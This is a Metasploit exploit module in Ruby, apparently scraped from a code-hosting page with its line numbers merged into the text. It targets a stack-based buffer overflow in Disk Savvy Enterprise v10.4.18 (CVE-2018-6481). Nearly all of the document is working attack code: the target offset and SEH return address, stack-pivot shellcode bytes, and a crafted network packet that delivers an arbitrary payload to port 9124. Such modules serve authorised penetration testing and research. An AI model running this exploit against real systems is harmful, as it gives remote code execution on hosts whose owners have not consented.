Path: blob/master/modules/exploits/windows/misc/disk_savvy_adm.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Disk Savvy Enterprise v10.4.18',16'Description' => %q{17This module exploits a stack-based buffer overflow vulnerability18in Disk Savvy Enterprise v10.4.18, caused by improper bounds19checking of the request sent to the built-in server. This module20has been tested successfully on Windows 7 SP1 x86.21},22'License' => MSF_LICENSE,23'Author' => [24'Daniel Teixeira'25],26'DefaultOptions' => {27'EXITFUNC' => 'thread'28},29'Platform' => 'win',30'Payload' => {31'BadChars' => "\x00\x02\x0a\x0d\xf8",32'Space' => 80033},34'Referencess' => [35[ 'CVE', '2018-6481' ]36],37'Targets' => [38[39'Disk Savvy Enterprise v10.4.18',40{41'Offset' => 124,42'Ret' => 0x10056d1343}44]45],46'Privileged' => true,47'DisclosureDate' => '2017-01-31',48'DefaultTarget' => 0,49'Notes' => {50'Reliability' => UNKNOWN_RELIABILITY,51'Stability' => UNKNOWN_STABILITY,52'SideEffects' => UNKNOWN_SIDE_EFFECTS53}54)55)5657register_options([Opt::RPORT(9124)])58end5960def exploit61seh = generate_seh_record(target.ret)62connect6364buffer = make_nops(target['Offset'])65buffer << seh66buffer << "\x83\xc4\x7f" * 13 # ADD esp,7fh67buffer << "\x83\xc4\x21" # ADD esp,21h68buffer << "\xff\xe4" # JMP esp69buffer << payload.encoded70buffer << Rex::Text.rand_text_alphanumeric(1)7172header = "\x75\x19\xba\xab"73header << "\x03\x00\x00\x00"74header << "\x00\x40\x00\x00"75header << [buffer.length].pack("V")76header << [buffer.length].pack("V")77header << [buffer[-1].ord].pack("V")78packet = header79packet << buffer8081sock.put(packet)82handler83end84end858687